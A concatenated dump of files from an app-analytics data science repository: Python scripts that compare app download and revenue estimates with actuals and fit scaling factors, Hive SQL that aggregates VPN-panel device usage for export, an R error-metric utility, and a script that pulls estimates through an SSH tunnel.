return np.nan
else:
return x.std()
df = df.drop(['rank', 'feed_id'], axis=1)
# Sum different feeds for each (app_id, date, category) combination
df_feeds_caggregated = df.groupby(['app_id', 'date', 'category_id']).sum()
std_within_categories = df_feeds_caggregated.groupby(level=['app_id', 'date']).aggregate(calculate_sd)
std_info = std_within_categories.groupby(level='app_id').aggregate(pd.Series.mean)
std_info.rename(columns={"('app_id', '')": "app_id"}, inplace=True)
return std_info.reset_index().rename(columns={'estimate': 'estimate_sd_mean'})
#print(grouped.std(level=['app_id', 'date']).groupby(level='app_id').aggregate().head())
# std = grouped.reset_index().drop('category_id', axis=1).groupby(['app_id', 'date']).std().reset_index()
# estimate_sd = std.groupby('app_id').aggregate([pd.Series.mean, pd.Series.median])
# estimate_sd
#print(grouped.reset_index(level=2).std().reset_index())
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_ql/sample_week_overview.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-08-30';
set end_date = '2015-09-05';
-- Get all devices connected to VPN for the selected week
drop table if exists connected_devices;
create table connected_devices
as
select
distinct device_id
from
vpn_sample_data_connection_session_us
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
;
-- Select iPhone and iPad devices for bundle_id
drop table if exists ios_devices_types;
create table ios_devices_types
as
select
distinct device_id
from
vpn_new_device_info_us
where
platform = 'iOS'
and type in ('Smartphone','Tablet')
and sdkbundleid = 'com.vpndefender.VPNDefender'
;
-- Select number of iPhones and iPads connected in the selected week
drop table if exists connected_devices_ios;
create table connected_devices_ios
as
select
ios.device_id
from
ios_devices_types ios
join connected_devices connected
on ios.device_id = connected.device_id
;
-- Select weekly active devices
drop table if exists period_active_weekly_us;
create table period_active_weekly_us
as
select
x.datestr,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
-- Get first and last active week for connected iPhones and iPads
drop table if exists active_devices_ios;
create table active_devices_ios
as
select
active.device_id,
min(datestr) as first_active_week,
max(datestr) as last_active_week
from
connected_devices_ios connected
join period_active_weekly_us active
on connected.device_id = active.device_id
group by
active.device_id
;
-- Get the new sample units for the selected week
-- Load in ptyhon to get demo composition
drop table new_active_ios_types_export;
create table new_active_ios_types_export (
device_id string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/new_active'
;
insert overwrite table new_active_ios_types_export
select
device_id
from
active_devices_ios
where
first_active_week = ${hiveconf:end_date}
;
-- Get week overview
select
all_active.count,
connected.count,
new_active.count
from (
select
count(*) as count
from
active_devices_ios
where
last_active_week = ${hiveconf:end_date}
) all_active
JOIN
(
select
count(*) as count
from
connected_devices_ios
) connected
JOIN
(
select
count(*) as count
from
active_devices_ios
where
first_active_week = ${hiveconf:end_date}
) new_active
;
<file_sep>/user_profile/hive_ql/export_time_series.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-04-01';
set end_date = '2015-04-30';
-- Get unique iOS devices
drop table if exists ios_devices_types;
create table ios_devices_types
as
select
device_id,
type
from
vpn_new_device_info
where
platform = 'iOS'
and type in ('Smartphone', 'Tablet')
group by
device_id,
type
;
-- get category per bundle_id
drop table if exists category;
create table category
as
select
distinct bundle_id,
app_category as category
from
vpn_sample_dpi_apps
;
-- get usage for selected time frame
drop table if exists daily_data;
create table daily_data
as
select
x.device_id,
x.bundle_id,
x.category,
x.device_type,
if(isnull(x.sign),
hour(from_unixtime(x.int_time)),
if(x.sign = "+",
hour(from_unixtime(x.int_time + x.value_int * 3600 + x.value_extra_int * 60)),
hour(from_unixtime(x.int_time - x.value_int * 3600 - x.value_extra_int * 60)))) as hour,
if(isnull(x.sign),
from_unixtime(x.int_time,'u'),
if(x.sign = "+",
from_unixtime(x.int_time + x.value_int * 3600 + x.value_extra_int * 60,'u'),
from_unixtime(x.int_time - x.value_int * 3600 - x.value_extra_int * 60,'u'))) as day
from (
select
usage.device_id,
usage.bundleid as bundle_id,
cat.category,
ios.type as device_type,
offset,
cast(starttime/1000 as bigint) as int_time,
if(offset != 'Unknown', substr(offset,1,1), NULL) as sign,
if(offset != 'Unknown', floor(cast(substr(offset,2) as int)/100.0), NULL) as value_int,
if(offset != 'Unknown', pmod(cast(substr(offset,2) as int),100), NULL) as value_extra_int
from
vpn_sample_data_session usage
join ios_devices_types ios
on ios.device_id = usage.device_id
join category cat
on cat.bundle_id = usage.bundleid
where
usage.country = 'US'
and usage.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
) x
;
-- Export daily data
drop table daily_data_export;
create table daily_data_export (
bundle_id string,
category string,
device_type string,
hour int,
freq int,
day int)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/daily_data'
;
insert overwrite table daily_data_export
select
bundle_id,
category,
device_type,
hour,
count(*) as freq,
day
from
daily_data
group by
bundle_id,
category,
device_type,
hour,
day
;
<file_sep>/ranking_change/downloads_revenue_consistency.py
'''
Created on Sep 13, 2013
@author: perezrafael
'''
import pandas as pd
import pandas as pd
import config
import operator
import scipy
import numpy as np
from numpy.linalg import norm
from scipy import spatial
from sklearn import cluster
import csv
import matplotlib.pyplot as plt
metadata_f = '/Users/perezrafael/appannie/data/final_9_4/debug_file_20130904.csv'
#metadata_f = '/Users/perezrafael/appannie/data/2013-09-10_US_UK_JP_CN/debug_file_143441_6014+rsd+zvalue.csv'
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
def plot_actuals(df):
########### Plor actuals VS Estimates ################
for n,g in df.groupby(['Country', 'Category', 'Type', 'Date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p1, = ax.plot(g['Actual'], g['Actual'], 'r-', label='Actuals')
p2, = ax.plot(g['Actual'], g['Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Actual'], g['Estimate_based_on_downloads'], 'g.', alpha=0.4, label='Estimate based on downloads')
p4, = ax.plot(g['Actual'], g['Estimate_based_on_revenue'], 'm.', alpha=0.4, label='Estimtate based on revenue')
ax.legend(loc='best')
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actuals')
plt.ylabel('Estimates')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/revenue_downloads_consistency/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['Country','Category', 'Type', 'Date']):
fig = plt.figure()
g = g.sort('Actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('orig_rel_error', ascending=True)
p1, = ax.plot(g['orig_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', alpha=0.4, label='Original SBE')
g = g.sort('based_on_downloads_rel_error', ascending=True)
p2, = ax.plot(g['based_on_downloads_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', alpha=0.4, label='Estimate based on downloads')
g = g.sort('based_on_revenue_rel_error', ascending=True)
p3, = ax.plot(g['based_on_revenue_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'm-', alpha=0.4, label='Estimate based on revenue')
ax.legend(loc='best')
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/revenue_downloads_consistency/%s.png'%title)
#### Data cleaning ######
def preprocess_metadata(df):
df['SS Country'] = df['APP Country'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['APP Country']
df['SS Category'] = df['SS-APP Category-S'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['SS Type'] = df['SS-APP Feed-S'].apply(lambda x: feed_type_format[x])
df['SS Market'] = df['SS-APP Feed-S'].apply(lambda x: feed_market_format[x])
del df['SS-APP Feed-S']
df = df[df['SS-APP Universal-S']==False]
df = df.fillna(0.0)
df.rename(columns={'DATE-Day': 'SS Date',
'AN-APP Actual-S': 'SS AN-APP Actual-S',
'INT-APP Estimate Weighted SBE-S': 'SS-APP Estimate Weighted SBE-S',
'AN-APP Actual Adj-C': 'SS Adjusted Actual'},
inplace=True)
matching = [s for s in df.columns if 'SS' in s]
df = df[matching]
df.rename(columns={'SS Country': 'Country',
'SS Category': 'Category',
'SS Type': 'Type',
'SS Market': 'Market',
'SS Date': 'Date',
'SS-Business Model-C': 'business_model',
'SS-APP ID-S': 'App ID',
'SS-APP Rank-S': 'Rank',
'SS-APP Estimate Weighted SBE-S': 'Estimate',
'SS Adjusted Actual': 'Adjusted Actual'},
inplace=True)
return df
def main():
df = preprocess_metadata(pd.read_csv(metadata_f))
df = df[(df['Date']=='2013-08-03') | (df['Date']=='2013-08-17')]
df = df[df['business_model']=='Pure Paid']
df = df[df['Type']!='Free']
df = df[['Country', 'Category', 'Type', 'Date', 'App ID', 'Adjusted Actual', 'Estimate', 'SS-APP Price-S']]
df['downloads_based_on_revenue'] = df['Estimate'] / df['SS-APP Price-S']
df['revenue_based_on_downloads'] = df['Estimate'] * df['SS-APP Price-S']
df['Estimate_based_on_revenue'] = 0.0
#df['Estimate_based_on_revenue'][df['Type']=='Paid'] = (df['Estimate'][df['Type']=='Paid'] + df['downloads_based_on_revenue'][df['Type']=='Paid'])/2.0
df['Estimate_based_on_revenue'][df['Type']=='Paid'] = df['downloads_based_on_revenue'][df['Type']=='Paid']
df['Estimate_based_on_revenue'][df['Type']=='Grossing'] = df['Estimate'][df['Type']=='Grossing']
df['Estimate_based_on_downloads'] = 0.0
#df['Estimate_based_on_downloads'][df['Type']=='Grossing'] = (df['Estimate'][df['Type']=='Grossing'] + df['downloads_based_on_revenue'][df['Type']=='Grossing'])/2.0
df['Estimate_based_on_downloads'][df['Type']=='Grossing'] = df['downloads_based_on_revenue'][df['Type']=='Grossing']
df['Estimate_based_on_downloads'][df['Type']=='Paid'] = df['Estimate'][df['Type']=='Paid']
print df
df = df.groupby(['Country', 'Category', 'Type', 'App ID', 'Date']).sum().reset_index()
df['orig_rel_error'] = (df['Estimate'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['based_on_downloads_rel_error'] = (df['Estimate_based_on_downloads'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['based_on_revenue_rel_error'] = (df['Estimate_based_on_revenue'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
print df
df['Actual'] = df['Adjusted Actual']
plot_actuals(df)
plot_80_20(df)
if __name__ == '__main__':
main()<file_sep>/google-analytics/constant/__init__.py
## This is Google Analytics Benchmarking Version v1.0
# In this foder, the constants and lookup tables are placed within.
<file_sep>/universals/test.py
'''
Created on Mar 29, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import os.path
import sklearn
def reformat_types(df):
for column in df.columns:
if type(df[column][0]) is str:
new_column = df[[column]].drop_duplicates().reset_index()[[column]]
new_column = new_column.reset_index()
if column != 'index':
new_column.rename(columns={'index' : 'level_0'}, inplace=True)
df = df.merge(new_column, on=column)
df = df.drop(column, axis=1)
df.rename(columns={'level_0' : column}, inplace=True)
return df
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
if __name__ == '__main__':
COUNTRY = 143441
input_dirs = _listdir_with_fullpath('/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/estreal_daily_raw')
dfs = map(pd.read_csv, input_dirs)
df = pd.concat(dfs)
df = df[(df['feed_id']==0) | (df['feed_id']==101)]
df = reformat_types(df)
gdf = df.groupby(['category_id', 'date', 'app_id'])
gdf = gdf.size().reset_index()
gdf.rename(columns={0:'count'}, inplace=True)
universals = gdf[gdf['count']>1][['app_id']].drop_duplicates()
universals['universal'] = 1
gdf = gdf.merge(universals, on='app_id', how='inner')
gdf['ratio'] = -1
gdf['ratio'][(gdf['universal']==1) & (gdf['count']==1)] = 1
universals = df.merge(gdf, on=['category_id', 'app_id', 'date'], how='inner')
universals = universals.sort('units', ascending=False)
#universals = universals[:100000]
concatenated = pd.DataFrame()
ugdf = universals[['category_id', 'rank', 'app_id', 'estimate', 'feed_id', 'units', 'date', 'ratio']].groupby('feed_id')
first_pass = True
prev_name = ''
units_first_name = ''
for name, group in ugdf:
if first_pass:
concatenated = group
first_pass=False
units_first_name = 'units_%s'%name
else:
concatenated = concatenated.merge(group, on=['category_id', 'app_id', 'date'], how='outer', suffixes=['_%s'%prev_name, '_%s'%name])
concatenated['ratio_%s'%name][np.isnan(concatenated['ratio_%s'%name])] = 0
concatenated['ratio_%s'%prev_name][np.isnan(concatenated['ratio_%s'%prev_name])] = 0
#concatenated['ratio_%s'%name][concatenated['ratio_%s'%name]<0] = concatenated['estimate_%s'%name]/(concatenated['estimate_%s'%name] + concatenated['estimate_%s'%prev_name])
#concatenated['ratio_%s'%prev_name][concatenated['ratio_%s'%prev_name]<0] = concatenated['estimate_%s'%prev_name]/(concatenated['estimate_%s'%name] + concatenated['estimate_%s'%prev_name])
concatenated['ratio_%s'%name][concatenated['ratio_%s'%name]<0] = concatenated['estimate_%s'%name]/concatenated[units_first_name]
concatenated['ratio_%s'%prev_name][concatenated['ratio_%s'%prev_name]<0] = concatenated['estimate_%s'%prev_name]/concatenated[units_first_name]
concatenated['ratio_%s'%name][concatenated['ratio_%s'%name]>1] = 1
concatenated['ratio_%s'%prev_name][concatenated['ratio_%s'%prev_name]>1] = 1
concatenated[units_first_name][np.isnan(concatenated[units_first_name])]=concatenated['units_%s'%name][np.isnan(concatenated[units_first_name])]
concatenated = concatenated.drop('units_%s'%name, axis=1)
prev_name = name
concatenated['sbe'] = concatenated['estimate_0'].fillna(0) + concatenated['estimate_101'].fillna(0)
concatenated['rel_diff'] = ((concatenated['units_0'] - concatenated['sbe']) / concatenated['units_0']).abs()
concatenated = concatenated[concatenated['rel_diff']<0.01]
#concatenated['store_id'] = COUNTRY
concatenated.to_csv('/Users/perezrafael/appannie/data/%s_universal_test.csv'%COUNTRY, index=False)
universals = universals.drop(['universal', 'estimate'], axis=1)
gdf = universals.groupby(['app_id', 'category_id'])
plotting = False
for name, group in gdf:
title_str = '%s_%s'%name
single_feed = group[group['ratio']>0]
single_feed_size = single_feed.shape[0]
dual_feed_size = group[group['ratio']<0].shape[0]
if single_feed_size>0 and dual_feed_size>0 and plotting:
plt.clf()
#ax = plt.subplot(111)
plt.plot(group[group['feed_id']==0]['rank'], group[group['feed_id']==0]['units'], 'b^', alpha=0.9)
plt.plot(group[group['feed_id']==101]['rank'], group[group['feed_id']==101]['units'], 'bs', alpha=0.9)
plt.plot(single_feed[single_feed['feed_id']==0]['rank'], single_feed[single_feed['feed_id']==0]['units'], 'r^', alpha=0.9)
plt.plot(single_feed[single_feed['feed_id']==101]['rank'], single_feed[single_feed['feed_id']==101]['units'], 'rs', alpha=0.9)
#plt.plot(group['date'].median(), group['units'].median(), 'b^', ms=20)
#plt.plot(group['date'].median(), single_feed['units'].median(), 'r^', ms=20)
plt.title(title_str)
#ax.set_xscale('log')
#ax.set_yscale('log')
plt.show()
<file_sep>/ranking_change/find_scales.py
'''
Created on Aug 22, 2013
@author: perezrafael
'''
import pandas as pd
import scipy
import scipy.optimize as opt
import sklearn
import config
import csv
import matplotlib.pyplot as plt
import operator
import numpy as np
import os
from matplotlib import cm
from sklearn import cluster
###### Input right now is debug files ######
metadata_f = '/Users/perezrafael/appannie/data/debug_file_20130830.csv'
data_dir = '/Users/perezrafael/appannie/data/2_countries_7_categories_from_20130801_to_20130819_P5'
SUBSCRIPTION_T = 0.5
##### scaling function ######
def scale(x, a):
return a * x
def power_law(x, a, b):
return a * (x ** b)
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
###### Get business model ########
min_IAP_from_subs = 0.0
grossing_business_models = {
'Pure Free': [operator.eq, 0.0, False, operator.eq, 0.0],
'Pure Paid': [operator.gt, 0.0, False, operator.eq, 0.0],
'Freemium': [operator.eq, 0.0, True, operator.le, min_IAP_from_subs],
'Paymium': [operator.gt, 0.0, True, operator.le, min_IAP_from_subs],
'Freemium + Subs': [operator.eq, 0.0, True, operator.gt, min_IAP_from_subs],
'Paymium + Subs': [operator.gt, 0.0, True, operator.gt, min_IAP_from_subs]
}
#### Data cleaning ######
def preprocess_metadata(df):
df = df[df['AVG']=='F']
del df['AVG']
del df['Start Date']
del df['End Date']
#del df['Rank Link']
del df['Customize']
del df['Included']
df['Country'] = df['Store'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['Store']
df['Category'] = df['Category'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['Main Category'] = df['Main Category'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['Type'] = df['Feed'].apply(lambda x: feed_type_format[x])
df['Market'] = df['Feed'].apply(lambda x: feed_market_format[x])
del df['Feed']
df.rename(columns={'Day':'Date'}, inplace=True)
df['z_value'][df['z_value']=='n/a'] = None
df['z_value'] = df['z_value'].astype(float)
df = df.fillna(0.0)
#df['% IAP revenues coming from subscription'] = df['% IAP revenues coming from subscription'].fillna(0.0)
#df['App Price'] = df['App Price'].fillna(0.0)
df['business_model'] = None
for k,v in grossing_business_models.iteritems():
df['business_model'][(v[0](df['App Price'], v[1])) & (df['Has IAP']==v[2]) & (v[3](df['% IAP revenues coming from subscription'], v[4]))] = k
#df['business_model'][(df['business_model']=='Pure Free') & (df['Total App Download Revenues']>0) & (df['Total IAP Download Units']==0)] = 'Pure Paid'
#df['business_model'][(df['business_model']=='Pure Free') & (df['Total App Download Revenues']==0) & (df['Total IAP Download Units']>0)] = 'Freemium'
#df['business_model'][(df['business_model']=='Pure Free') & (df['Total App Download Revenues']>0) & (df['Total IAP Download Units']>0)] = 'Paymium'
#df['business_model'][(df['business_model']=='Freemium') & (df['z_value']<0.7)] = 'Freemium_1'
#df['business_model'][(df['business_model']=='Freemium') & (df['z_value']>=0.7)] = 'Freemium_2'
#df['business_model'][df['business_model']=='Paymium + Subs'] = 'Combined Paymium'
#df['business_model'][df['business_model']=='Paymium'] = 'Combined Paymium'
#df['business_model'][df['business_model']=='Freemium + Subs'] = 'Combined Paymium'
df['rank_range'] = 0
df['rank_range'][df['Rank']<21] = 20
for rank in range(50,1600)[0::50]:
df['rank_range'][(df['Rank']<rank) & (df['rank_range']==0)] = rank
df = df.fillna(0.0)
#df = df.dropna()
return df
def analyze_z_value(df):
df = df[df['business_model']=='Freemium']
df['log_rank'] = np.log(df['Rank'])
df['log_adjusted_actual'] = np.log(df['Adjusted Actual'])
#df['z_value'][df['z_value']>df['z_value'].quantile(0.90)] = df['z_value'].quantile(0.90)
#df['z_value'][df['z_value']<df['z_value'].quantile(0.1)] = df['z_value'].quantile(0.1)
#df['z_norm'] = (df['z_value'] - df['z_value'].min()) / (df['z_value'].max() - df['z_value'].min())
#plt.scatter(np.log(df['Rank'][df['Category']=='Overall']), np.log(df['Adjusted Actual'][df['Category']=='Overall']), c=df['z_norm'][df['Category']=='Overall'], marker='o', cmap=cm.RdYlBu, alpha=0.4)
#plt.scatter(np.log(df['Rank'][df['Category']=='Games']), np.log(df['Adjusted Actual'][df['Category']=='Games']), c=df['z_norm'][df['Category']=='Games'], marker='^', cmap=cm.RdYlBu, alpha=0.4)
#plt.scatter(np.log(df['Rank'][df['Category']=='Casino']), np.log(df['Adjusted Actual'][df['Category']=='Casino']), c=df['z_norm'][df['Category']=='Casino'], marker='s', cmap=cm.RdYlBu, alpha=0.4)
#plt.show()
model = cluster.KMeans(n_clusters=3)
model.fit(df[['z_value']])
df['cluster_labels'] = model.labels_
for n,g in df.groupby('cluster_labels'):
print n
print g['z_value'].describe()
def get_scales(df, start, end):
df['scale'] = 1.0
results = []
###### Each scale is generated by Country, Category, Market, Type, Business Model and Rank range
for n, g in df.groupby(['Country', 'Category', 'Market', 'Type', 'business_model', 'rank_range']):
##### Filter only dates for scale generation
g3 = g[(g['Date']<=end) | (g['Date']>=start)]
##### Sort by error, drop top 10% #######
g3 = g3.sort('adjusted_rel_error', ascending=False)
remove = int(g3.shape[0]*0.1)
g3 = g3[remove:]
g3 = g3[['Daily Estimate', 'Adjusted Actual', 'Country', 'Category', 'Market', 'Type', 'App ID']].drop_duplicates()
##### Generate the scales based on testing data, if the scale can't be generated we assign it 1
try:
res = opt.curve_fit(scale, g3['Daily Estimate'].values, g3['Adjusted Actual'].values)
except:
res = [[None,0]]
g['scaling_count'] = g3.shape[0]
g['scale'] = res[0][0]
results.append(g)
print n
print res
results = pd.concat(results)
###### If the scale is greater than 2.0, asign 2.0 #######
#results['scale'][results['scale']>2.0] = 2.0
###### If the scale is smaller than 0.5, asign 0.5 #######
#results['scale'][results['scale']<0.5] = 0.5
#r2 = []
#for n, g in results[['Country', 'Category', 'Market', 'Type', 'business_model', 'scale', 'rank_range']].groupby(['Country', 'Category', 'Market', 'Type', 'business_model']):
# g = g.drop_duplicates()
# mean_scale = g['scale'].mean()
# g = g.sort('rank_range', ascending=True)
# g['scale'] = g['scale'].interpolate(method='linear')
# g['scale'] = g['scale'].fillna(mean_scale)
# r2.append(g)
#r2 = pd.concat(r2)
#del results['scale']
#results = results.merge(r2, on=['Country', 'Category', 'Market', 'Type', 'business_model', 'rank_range'])
results['Scaled Estimate'] = results['Daily Estimate'] * results['scale']
results = results.sort(['Country', 'Category', 'Date', 'Actual'], ascending=False)
results.to_csv('data/scales/%s_raw.csv'%end, index=False, quoting = csv.QUOTE_NONNUMERIC)
return results
def plot_actuals(df):
########### Plor actuals VS Estimates ################
for n,g in df.groupby(['Country', 'Category', 'Type']):
fig = plt.figure()
ax = fig.add_subplot(111)
p1, = ax.plot(g['Actual'], g['Actual'], 'r-', label='Actuals')
p2, = ax.plot(g['Actual'], g['Daily Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Actual'], g['Scaled Estimate'], 'g.', alpha=0.4, label='Scaled SBE')
ax.legend(loc='best')
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actuals')
plt.ylabel('Estimates')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/scales/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['Country','Category', 'Type']):
fig = plt.figure()
g = g.sort('Actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('orig_rel_error', ascending=True)
p1, = ax.plot(g['orig_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='Original SBE')
g = g.sort('scaled_rel_error', ascending=True)
p2, = ax.plot(g['scaled_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='Scaled SBE')
ax.legend(loc='best')
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/scales/%s.png'%title)
def main():
if metadata_f is None:
df = []
for (dirpath, dirnames, filenames) in os.walk(data_dir):
for filename in filenames:
if filename.endswith('.csv'):
sdf = pd.read_csv(os.sep.join([dirpath, filename]))
sdf = preprocess_metadata(sdf)
df.append(sdf)
df = pd.concat(df)
else:
df = preprocess_metadata(pd.read_csv(metadata_f))
###### We only want gorssing for now ######
df = df.dropna()
df = df[df['Type']=='Grossing']
df = df[df['Date']>='2013-08-01']
#df = df[df['Rank']<=200]
#df = df[df['Category']=='Overall']
df = df[df['Country']=='United States']
df['adjusted_error'] = (df['Daily Estimate'] - df['Adjusted Actual']).abs()
df['adjusted_rel_error'] = df['adjusted_error']*1.0/df['Adjusted Actual']
start = '2013-08-18'
end = '2013-08-24'
df = get_scales(df, start, end)
df[['Country', 'Category', 'Market', 'Type', 'rank_range', 'business_model', 'scale', 'scaling_count']].drop_duplicates().to_csv('data/scales/scales.csv' ,index=False, quoting = csv.QUOTE_NONNUMERIC)
######### Everything below this line is for plotting and presenting results ##############
df = df[df['Date']>='2013-08-09']
sum = df.groupby(['Country', 'Category', 'Type', 'App ID', 'App Name', 'Publisher ID', 'Publisher Name', 'business_model', 'IS Universal']).sum().reset_index()
#sum = results.groupby(['Country', 'Category', 'Type', 'App ID', 'App Name', 'Date', 'Publisher ID', 'Publisher Name', 'business_model', 'IS Universal']).mean().reset_index()
sum['Actual'] = sum['Adjusted Actual']
sum = sum[['Country', 'Category', 'Type', 'App ID', 'App Name', 'Publisher ID', 'Publisher Name', 'business_model', 'IS Universal', 'Actual', 'Daily Estimate', 'Scaled Estimate']]
#sum = sum[['Country', 'Category', 'Type', 'App ID', 'App Name', 'Publisher ID', 'Publisher Name', 'Actual', 'Daily Estimate', 'Scaled Estimate']]
sum = sum.drop_duplicates()
sum = sum.dropna()
sum = sum.sort('Actual', ascending=False)
sum['orig_error'] = (sum['Daily Estimate'] - sum['Actual']).abs()
sum['orig_rel_error'] = sum['orig_error']*1.0/sum['Actual']
sum['scaled_error'] = (sum['Scaled Estimate'] - sum['Actual']).abs()
sum['scaled_rel_error'] = sum['scaled_error']*1.0/sum['Actual']
sum['rel_error_change'] = sum['orig_rel_error'] - sum['scaled_rel_error']
sum.to_csv('data/scales/%s_split_error.csv'%end ,index=False, quoting = csv.QUOTE_NONNUMERIC)
plot_actuals(sum)
plot_80_20(sum)
if __name__ == '__main__':
main()<file_sep>/product_quality/fetch_webui_estimates.py
'''
Created on Apr 16, 2013
@author: perezrafael
'''
import os
import subprocess
from subprocess import Popen
import paramiko
if __name__ == '__main__':
psql = "psql aa -U aa -t -A -F\",\" -c \"set search_path=ios;\
SELECT store_id, feed_id, category_id, app_id, estimate, date\
FROM store_app_daily_list l, store_app_daily_estimate e\
WHERE l.id = e.list_id and date >= '2012-12-01\\'\
and store_id in (143460,143455,143465,143442,143443,143450,143462,143469,143466,143444,143441)\
limit 10;\""
args = ['ssh', '-L', '64002:172.16.31.10:5432', '-p20002', 'scientist@172.16.31.10', psql]
host = '172.16.31.10'
port = 5432
user = 'scientist'
passwd = '<PASSWORD>'
#ssh = paramiko.SSHClient()
#ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#ssh.connect(host, port=port, username=user, password=<PASSWORD>)
#ssh.exec_command(args.join(' '))
proc = Popen(args, stdin=subprocess.PIPE)
proc.communicate('scientist')<file_sep>/datathon/network_analysis/README.MD
# Network Analysis
[Presentation](https://drive.google.com/open?id=1r2fXQTjA7t8m-GLrcrBkesn-oSIz6olWXETcKIADuqw)
Topics:
* Clustering
* Using Dijkstra distance instead of direct connected neighbors for related apps
## Dijkstra distance Notebooks
* Preprocess data
* data_processing_v1.ipynb (VPN Defender data)
* data_processing_v1 - MDM.ipynb (MDM data)
* Analysis
* Network analysis - Dijkstra distance (final version uses MDM data)
<file_sep>/google-analytics/rincon_dump/KR-Android/2016.03.07 - 1 - Utilities.r
preprocessData = function(data) {
cols_of_interest = c("reporters_app", "reporters_all", "time_since_launch", "downloads", "moving_avg_dl", "total_downloads", "category_name", 'Active.Users')
#Remove outliers
data$id = row.names(data)
data = removeByLargeDifferenceInMyDMAndGA(data)
#data = removeLargeApps(data)
#Filter rows of interest
data[,cols_of_interest]
}
getPanelData = function(country_code, device_type) {
preprocessData(full_data[full_data$Country == country_code & full_data$Device.Type == device_type,])
}
removeLargeApps = function(data) {
data[data$reporters_app < as.double(quantile(data$reporters_app, 0.95)), ]
}
removeByLargeDifferenceInMyDMAndGA = function(data) {
data$error = 100 * (data[,'reporters_app'] - data[,'Active.Users']) / data[,'Active.Users']
low_error_threshold = as.double(quantile(data$error, 0.01))
high_error_threshold = as.double(quantile(data$error, 0.8))
data[(data$error < high_error_threshold) & (data$error > low_error_threshold), ]
}
getBaseline20PercAbsErrorRates = function(data) {
baseline_RSS = sum( (data$reporters_app - data$Active.Users) ^ 2)
baseline_TSS = sum((data$reporters_app - mean(data$Active.Users)) ^ 2)
baseline_rmse = sqrt( baseline_RSS / dim(data)[1])
baseline_r2 = 1 - (baseline_RSS / baseline_TSS)
baseline_abs_perc_error = 100.0 * abs(data$reporters_app - data$Active.Users ) / data$Active.Users
baseline_20_perc_abs_error = 100 * sum(baseline_abs_perc_error < 20) / dim(data)[1]
list('rmse' = baseline_rmse, 'r2' = baseline_r2, 'perc_abs_error_20' = baseline_20_perc_abs_error, 'abs_errors' = baseline_abs_perc_error)
}
plotCDFs = function(dataList, title) {
plot (c(0,100),c(0,100),type="n", main = title, # sets the x and y axes scales
xlab="Absolute Error %",ylab="% of App Entries", )
index = 1
colors = c('red','blue','green')
for (name in names(dataList)) {
current_data = dataList[[name]]
current_hist_data = hist(current_data[current_data < 100], breaks = 0:102, plot=FALSE)
cdf_data = 100*cumsum(current_hist_data$counts / length(current_data))
lines(current_hist_data$breaks[-1], cdf_data, col=colors[index], lwd=2.5) # adds a line for defense expenditures
index = index + 1
}
